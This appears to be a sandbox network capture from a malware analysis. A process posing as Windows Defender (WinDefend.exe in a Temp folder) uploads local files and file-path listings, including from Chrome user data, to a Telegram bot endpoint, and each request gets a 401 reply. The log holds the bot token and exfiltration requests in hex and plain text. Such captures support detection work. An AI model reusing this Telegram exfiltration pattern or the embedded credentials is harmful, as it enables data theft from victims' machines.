2024-05-23 13:35:19 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 2b 00 00 01 a3 08 02 00 00 00 a3 49 1d 97 00 00 44 e5 49 44 41 54 78 da ed 9d 5d af 1c 47 7a 98 e7 67 e4 27 e4 2e b6 99 a3 0b fe 01 fb de 80 2e 08 c4 3b 80 81 81 ed 8d 83 20 77 7b 13 26 f1 6a 84 c4 1b e3 24 ba b2 09 03 34 bc 88 e1 3d 56 b4 2b 5a b3 6b 43 5a 2f d7 5a 71 25 d1 47 14 a9 8f 25 8f f8 29 72 29 6a 29 89 40 d6 b2 77 83 80 a9 e9 9a ae 7a ab ea ad ea ee 99 9e ef e7 c1 88 9a a9 ae ae ae ee e9 e9 7a ce 5b d5 d5 83 ff 04 00 00 00 00 ab 65 60 fe fb 17 7f f0 21 2f 5e bc 78 f1 e2 c5 8b 17 af 95 bd 66 06 f6 14 00 00 00 00 56 05 06 06 00 00 00 80 81 01 00 00 00 60 60 00 00 00 00 80 81 01 00 00 00 60 60 00 00 00 00 80 81 01 00 00 00 60 60 00 00 00 00 80 81 01 00 00 00 60 60 00 00 00 00 18 98 e3 fb 5f Data Ascii: PNGIHDR+IDIDATx]Gzg'..; w{&j$4=V+ZkCZ/Zq%G%)r)j)@wzz[e`!/^xfV````````_
2024-05-23 13:35:19 UTC	4096	OUT	Data Raw: ee fc cc a5 07 a7 85 5f 52 27 c5 e7 b8 38 d6 a2 44 93 a8 7d 41 fe 74 cb 7e 43 db 7c ce 97 0e e9 6a 77 30 a8 5e f8 39 dc 47 bb cc 1f 81 36 85 2f be 6f ea b5 71 f3 7f 4a 18 58 8f 06 06 18 d8 e2 06 56 5d 72 65 13 34 3e 2a 5c 66 fc 35 a5 c3 15 6f e9 17 eb 5c 3d da 5e 01 f5 e6 c8 ec e1 c1 70 78 30 5f e1 ad 36 bd ae ed f6 d7 6c b4 cf 3c 6f 6b 94 3b 3f 8b e7 ad f8 28 f7 2b da 53 5b c4 50 7e 09 d1 37 12 7f 41 d3 35 ea 84 68 8b 2b 3d bd 97 73 ce 97 0f e9 52 be e2 ec 2a 25 05 ab ea e9 56 9b fe 5c ba 6d b5 1f 31 d2 ae 8d 18 18 06 06 18 58 c7 f6 ad f4 b7 bc 59 1e 5f 08 dd 35 65 43 ae 2f 3d b4 46 c9 6e fa 2b 7b fe fa de 87 09 ad 6b bb 5b 63 60 b9 f3 b3 e9 bc 8d 0f 67 d0 60 86 c7 f6 28 34 b0 b0 92 d1 17 b4 86 53 7e 59 06 96 9c 7b ed 0f e9 2a 0c 2c ae 9e f8 ce a6 4b c6 Data Ascii: _R'8D}At~C\|jw0^9G6/oqJXV]re4>\f5o\=^px0_6l<ok;?(+S[P~7A5h+=sR%V\m1XY_5eC/=Fn+{k[c`g`(4S~Y{*,K
2024-05-23 13:35:19 UTC	4096	OUT	Data Raw: 6f 60 53 1f 72 ab 34 da cd c2 8f d9 96 8f 0f 3f 39 3c 9c 10 03 5b 8a 81 dd 05 c8 83 81 01 00 06 76 a8 0b d8 e1 89 fd 77 f9 06 26 85 48 4f e8 d9 c0 26 bb f3 94 48 0c 0c 30 30 00 80 9d 31 b0 5a bd 22 05 73 0f c2 96 0f ba f6 cf e1 76 d2 54 09 ce c4 65 3e 89 56 8f 3b fe 14 df 72 1b ae 8a 3a 1c 85 bd 93 4e a0 c2 37 71 b6 fc 16 c3 98 5b 26 f3 b4 cc d1 c8 a4 9d 3e 7d 5a 7d 4a 78 10 b4 0b 36 13 27 64 eb b1 0f 06 c6 58 bd dd 06 03 03 00 0c ac 3f 03 f3 e2 25 15 cc 0f 0c ab 84 c2 a9 8f d4 0e 9f 38 7b 1b 24 7a 83 0a ec 47 09 b5 39 29 ab 8a 72 46 24 dc 28 31 b0 42 b6 64 8b c2 8a 02 6b 0c 32 0b 4b 33 6f 45 be ba 62 f1 1e 2a 11 36 5b 94 58 7d 0f 63 60 38 0a 06 86 81 01 00 06 d6 ca c0 a4 11 f9 f8 54 e0 49 72 2c 7c 10 1e 0a ed 44 24 8a 50 59 1c 0b 6a 8c 81 9d 3c 2d 85 be Data Ascii: o`Sr4?9<[vw&HO&H001Z"svTe>V;r:N7q[&>}Z}Jx6'dX?%8{$zG9)rF$(1Bdk2K3oEb*6[X}c`8TIr,\|D$PYj<-
2024-05-23 13:35:19 UTC	4096	OUT	Data Raw: 06 f6 da 6b af a9 9a 95 8b 81 49 39 33 eb 22 55 18 18 60 60 5b 6d 60 73 94 99 33 b0 be 8a da 2a 03 0b e6 f3 13 fd f5 71 6f 63 ad 5e b1 82 45 f3 01 76 9b db 4f 79 70 d8 6c 24 43 a1 1a f1 e6 d2 d2 b4 ed aa 89 f1 64 86 69 02 ec 92 81 5d b8 70 a1 31 b1 93 81 d9 11 60 2f bd f4 52 a7 1f a6 bd 6b 92 d1 60 18 18 60 60 fd 18 98 ef 8d 9b c5 91 32 06 76 34 3e 08 fb 2e 93 15 67 fd 73 22 4d 96 20 b3 f9 55 67 a5 f9 f5 5c ae 6a dd f1 50 64 13 fd 86 dd 8b 1a 0e 0f c2 48 99 66 54 c7 6e 1f c7 e1 41 88 36 1d 1e 99 a0 92 b9 72 7a 37 30 75 3e 3f 2d aa 14 dc ff 1c 8c 0a 4d 6e c4 69 3d b7 5f ba 76 76 16 e5 d2 e6 44 c1 d1 04 86 f1 76 e3 44 31 c1 61 e6 68 c0 ee 18 d8 fb ef bf ff ec b3 cf 9e 3b 77 4e 26 9a 8f 26 d1 2c 9a cf c0 6c 17 64 7a f3 a3 8d 72 59 d2 b5 ec 68 30 b3 2e 52 85 Data Ascii: kI93"U``[m`s3*qoc^EvOypl$Cdi]p1`/Rk```2v4>.gs"M Ug\jPdHfTnA6rz70u>?-Mni=_vvDvD1ah;wN&&,ldzrYh0.R
2024-05-23 13:35:19 UTC	1310	OUT	Data Raw: 98 3b 15 a6 01 32 cd 90 69 8c 4c 93 64 1a 26 1b fa 32 4d 95 1d fb d5 97 7e 2d df c0 8c 76 f9 d0 54 2d 4f 3e 00 16 85 b8 f2 b2 95 4d ac 5d 8d 00 d8 b6 19 98 93 30 1b 0c 33 27 b7 f9 f3 c2 aa 98 c5 9c f7 bf fa ab bf fa f3 26 4c 1e 1e a6 01 00 00 8b f3 b0 c2 35 43 a6 49 32 0d 93 75 2f 1b fa ea 51 bf d6 68 60 51 c4 6a 3e 03 9b 15 1f 6c 04 b6 c7 c0 22 0f b3 2a e6 6c cc f0 6b bf f6 6b bf ac f8 45 1e 93 47 3c 53 f5 2f 7e 4b b8 fd 6f fd 45 fb 87 b1 9a 15 0f be fe 66 9b c4 ec fa ad b6 f7 e6 d7 0f 5c 99 b6 b2 e6 93 4c 2c e4 6f ae 73 fb dd 6f b7 bf 26 61 5a ca ec 7f 6d 8f 61 a9 ce 7a 55 db 1e e5 b6 45 76 a9 2d 00 40 65 5a 12 6b 5d 56 bc 96 e1 5e eb ed 85 8c 46 6d cd 69 60 95 82 8d 46 08 d8 36 1b 58 a4 62 92 53 a7 4e fd bf 0c 77 ee dc f9 f5 5f ff f5 ef 7e f7 bb 26 cf Data Ascii: ;2iLd&2M~-vT-O>M]03'&L5CI2u/Qh`Qj>l"*lkkEG<S/~KoEf\L,oso&aZmazUEv-@eZk]V^Fmi`F6XbSNw_~&
2024-05-23 13:35:19 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 32 39 34 65 30 35 33 65 2d 38 39 34 32 2d 34 33 32 66 2d 39 33 37 38 2d 37 39 31 34 36 61 32 32 33 30 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --294e053e-8942-432f-9378-79146a22301dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:19 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:19 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 32 39 34 65 30 35 33 65 2d 38 39 34 32 2d 34 33 32 66 2d 39 33 37 38 2d 37 39 31 34 36 61 32 32 33 30 31 64 2d 2d 0d 0a Data Ascii: --294e053e-8942-432f-9378-79146a22301d--
2024-05-23 13:35:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
157	192.168.2.5	61205	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:19 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="56c8f7f5-07e0-40b7-a32b-83443e9ba68d" Host: api.telegram.org Content-Length: 2055 Expect: 100-continue
2024-05-23 13:35:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:19 UTC	40	OUT	Data Raw: 2d 2d 35 36 63 38 66 37 66 35 2d 30 37 65 30 2d 34 30 62 37 2d 61 33 32 62 2d 38 33 34 34 33 65 39 62 61 36 38 64 0d 0a Data Ascii: --56c8f7f5-07e0-40b7-a32b-83443e9ba68d
2024-05-23 13:35:19 UTC	111	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 52 48 50 5f 69 63 6f 6e 73 5f 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 52 48 50 5f 69 63 6f 6e 73 5f 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=RHP_icons_2x.png; filename*=utf-8''RHP_icons_2x.png
2024-05-23 13:35:19 UTC	1719	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 02 58 08 03 00 00 00 a3 1b b3 99 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 b4 50 4c 54 45 ff ff ff 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 6c d6 e6 92 8a ff 32 ad 93 ed 75 69 28 61 5e 77 00 00 00 3c 74 52 4e 53 00 11 11 11 11 22 22 Data Ascii: PNGIHDRdXsBITOPLTEl2uil2uil2uil2uil2uil2l2uil2uil2uil2uil2uil2uil2uil2uil2ui(a^w<tRNS""
2024-05-23 13:35:19 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 36 63 38 66 37 66 35 2d 30 37 65 30 2d 34 30 62 37 2d 61 33 32 62 2d 38 33 34 34 33 65 39 62 61 36 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --56c8f7f5-07e0-40b7-a32b-83443e9ba68dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:19 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:19 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 36 63 38 66 37 66 35 2d 30 37 65 30 2d 34 30 62 37 2d 61 33 32 62 2d 38 33 34 34 33 65 39 62 61 36 38 64 2d 2d 0d 0a Data Ascii: --56c8f7f5-07e0-40b7-a32b-83443e9ba68d--
2024-05-23 13:35:20 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
158	192.168.2.5	61206	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:20 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="5ffb5b01-7219-42ea-bcfc-b2424c6381eb" Host: api.telegram.org Content-Length: 1830 Expect: 100-continue
2024-05-23 13:35:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:20 UTC	40	OUT	Data Raw: 2d 2d 35 66 66 62 35 62 30 31 2d 37 32 31 39 2d 34 32 65 61 2d 62 63 66 63 2d 62 32 34 32 34 63 36 33 38 31 65 62 0d 0a Data Ascii: --5ffb5b01-7219-42ea-bcfc-b2424c6381eb
2024-05-23 13:35:20 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=64.png; filename*=utf-8''64.png
2024-05-23 13:35:20 UTC	1514	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 05 b1 49 44 41 54 78 9c ed 5b 4d 68 5c 55 14 fe ce bd ef cd 4f d2 26 a4 6d 1a aa 95 6c c4 9f 40 11 83 64 a1 45 ba 30 0b 41 90 1a 53 fc 01 41 bb 73 2d 48 eb a2 71 11 83 e0 3a e0 c6 a2 a2 48 a7 ba 52 04 2d 52 fc e9 22 c8 88 5a 42 11 77 35 85 fe d8 34 ad 93 4e e6 bd 7b 8e 8b f7 de e4 4f 67 de cc bb 6f 7e c8 7c f0 18 18 de bb e7 dc ef 9e 73 ee 39 97 7b 08 cd 60 06 0a 63 d3 d4 d4 b7 b1 51 00 8e c1 a4 2b a3 19 08 52 9e f8 26 a4 2e ab 29 01 e3 1f 1d 7d 98 33 78 40 03 19 12 12 21 b1 a6 28 09 89 64 15 ad 2d 97 56 2e 1e ff fa 9b 50 47 b1 35 fe 36 79 8d bc 3c 76 e6 c8 ae 1c ef 9d 57 8a 5e 20 57 b9 4a 2b eb 0a 89 08 94 56 28 ad 94 70 e5 e2 5f 6f fd 3d 57 7c 07 d3 Data Ascii: PNGIHDR@@iqIDATx[Mh\UO&ml@dE0ASAs-Hq:HR-R"ZBw54N{Ogo~\|s9{`cQ+R&.)}3x@!(d-V.PG56y<vW^ WJ+V(p_o=W\|
2024-05-23 13:35:20 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 66 66 62 35 62 30 31 2d 37 32 31 39 2d 34 32 65 61 2d 62 63 66 63 2d 62 32 34 32 34 63 36 33 38 31 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --5ffb5b01-7219-42ea-bcfc-b2424c6381ebContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:20 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:20 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 66 66 62 35 62 30 31 2d 37 32 31 39 2d 34 32 65 61 2d 62 63 66 63 2d 62 32 34 32 34 63 36 33 38 31 65 62 2d 2d 0d 0a Data Ascii: --5ffb5b01-7219-42ea-bcfc-b2424c6381eb--
2024-05-23 13:35:20 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:20 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
159	192.168.2.5	61207	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:20 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:20 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 64 64 64 62 65 36 30 35 38 61 34 38 36 66 37 30 34 38 36 37 33 65 34 62 31 34 33 66 37 63 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 34 64 64 64 62 65 36 30 35 38 61 34 38 36 66 37 30 34 38 36 37 33 65 34 62 31 34 33 66 37 63 34 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 39 2b Data Ascii: chat_id=1655240967&text=File%3A+4dddbe6058a486f7048673e4b143f7c4.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C4dddbe6058a486f7048673e4b143f7c4.png%0ASize%3A+19+
2024-05-23 13:35:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
160	192.168.2.5	61208	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:20 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 188 Expect: 100-continue
2024-05-23 13:35:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:21 UTC	188	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 65 61 72 63 68 45 6d 61 69 6c 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 53 65 61 72 63 68 45 6d 61 69 6c 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 32 34 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+SearchEmail.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CSearchEmail.png%0ASize%3A+524+B
2024-05-23 13:35:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
161	192.168.2.5	61209	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:21 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:21 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+96.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:22 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
162	192.168.2.5	61210	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:21 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="3e961a6e-0a40-44ab-8080-b1959066e660" Host: api.telegram.org Content-Length: 20252 Expect: 100-continue
2024-05-23 13:35:22 UTC	40	OUT	Data Raw: 2d 2d 33 65 39 36 31 61 36 65 2d 30 61 34 30 2d 34 34 61 62 2d 38 30 38 30 2d 62 31 39 35 39 30 36 36 65 36 36 30 0d 0a Data Ascii: --3e961a6e-0a40-44ab-8080-b1959066e660
2024-05-23 13:35:22 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 64 64 64 62 65 36 30 35 38 61 34 38 36 66 37 30 34 38 36 37 33 65 34 62 31 34 33 66 37 63 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 64 64 64 62 65 36 30 35 38 61 34 38 36 66 37 30 34 38 36 37 33 65 34 62 31 34 33 66 37 63 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=4dddbe6058a486f7048673e4b143f7c4.png; filename*=utf-8''4dddbe6058a486f7048673e4b143f7c4.png
2024-05-23 13:35:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:22 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 48 00 00 01 4e 08 02 00 00 00 f2 cd 75 78 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ed dd 7d 74 5b e7 7d 27 f8 df 7d c1 1b 09 5c 52 94 68 49 16 6c c9 91 63 9a 70 63 45 b1 5c 62 b2 f1 3a 49 4b 76 53 d5 76 27 64 37 a3 38 b3 c7 64 b2 4b f9 cc ac 38 67 ce 4a dd 39 47 cc 6c 43 9d 39 ad 38 bb 53 aa 33 6b b1 a7 25 7d ba b1 d5 b4 80 cf 26 8e a6 5b b0 b5 9c 71 32 05 5a 7b 54 a6 35 68 25 52 22 c7 97 92 2c be 88 bc 04 09 e2 e5 e2 ee 1f 0f 79 75 09 80 20 88 b7 0b 80 df 4f 7d 52 10 02 2e 1e 40 d4 fd e2 79 9e df f3 5c 2e f4 81 4c 00 00 c5 49 24 b4 3b b7 e2 77 6e c7 3f be 95 c8 fd 48 57 b3 f0 d0 41 db ee 3d 62 53 93 58 aa 57 e7 79 8e e7 05 e2 36 7f 84 46 a9 94 9a Data Ascii: PNGIHDRHNuxpHYs&? IDATx}t[}'}\RhIlcpcE\b:IKvSv'd78dK8gJ9GlC98S3k%}&[q2Z{T5h%R",yu O}R.@y\.LI$;wn?HWA=bSXWy6F
2024-05-23 13:35:22 UTC	4096	OUT	Data Raw: bf 95 65 ca f3 2f 56 59 48 2f 26 d6 c3 0c 00 80 a9 c6 60 a3 32 64 5b 63 a3 66 1c 84 54 93 f4 e3 f7 b8 c3 8f 6b ad b5 ff 15 7e 25 b2 96 0a 7a 37 45 c7 fa 2b db 3a 1a 72 02 00 6a 5d 95 06 1b 6d 92 6d cd bb 9a e7 66 e7 0a b8 f4 36 5b df 96 36 c1 76 e3 03 4e 59 a8 a5 4b 6f 2b 0b 14 8b 51 6c 75 ad e3 52 70 0f 09 00 a0 8e 55 6f b0 d1 da 55 dc 16 5b 5a 5a 38 7e ad db c1 2e 4f 3a 3f 3f 5f 70 b6 5d bf c6 ad 44 ee df 39 73 87 5b 8e 50 db 13 9a ad 2a af 61 a2 26 69 71 81 96 16 69 71 61 43 b3 61 4b 0d 4e 62 25 47 52 b3 46 44 0d 8d d4 ba 77 db bf 33 00 50 8b aa 3a d8 68 7d 7d 9b 31 db d8 7e 92 b3 73 73 05 1c 4d ef b7 19 43 62 25 42 3f 7e 8f 7b e8 90 b6 ef 40 49 9a 5c 02 b1 55 ba 37 47 77 ef ec 94 30 b3 d9 29 cf 